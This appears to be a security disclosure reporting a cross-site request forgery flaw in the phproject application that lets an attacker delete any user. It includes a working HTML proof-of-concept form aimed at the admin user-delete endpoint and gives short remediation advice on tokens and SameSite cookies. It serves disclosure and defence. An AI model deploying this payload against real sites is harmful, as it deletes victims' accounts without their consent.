Cross-Site Request Forgery (CSRF) in alanaktion/phproject
Aug 2nd 2021
Attacker able to delete any user with CSRF attack.
It does not matter at all that your application run in localhost or elsewhere, just it is enough to run on a browser and another low privilege user or attackers know the IP address or hostname of your application.
In CSRF attacks it is necessary that a user logged into your application just going to a malicious website and after that only with a redirection attacker can delete a user, this means only with visiting a site a user will be deleted.
🕵️♂️ Proof of Concept
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8000/phproject/admin/users/3/delete"> <input type="hidden" name="reassign" value="no-change" /> <input type="hidden" name="reassign-to" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Here a user with id equal to
3 will be deleted after clicking on submit button on PoC.html file.
Also for real attacks the submit button can be auto-submit.
This vulnerability is capable of delete any user.
set a token with a length bigger that 16 characters then attacker never can guess the url.
Also you cat turn
Strict in cookies.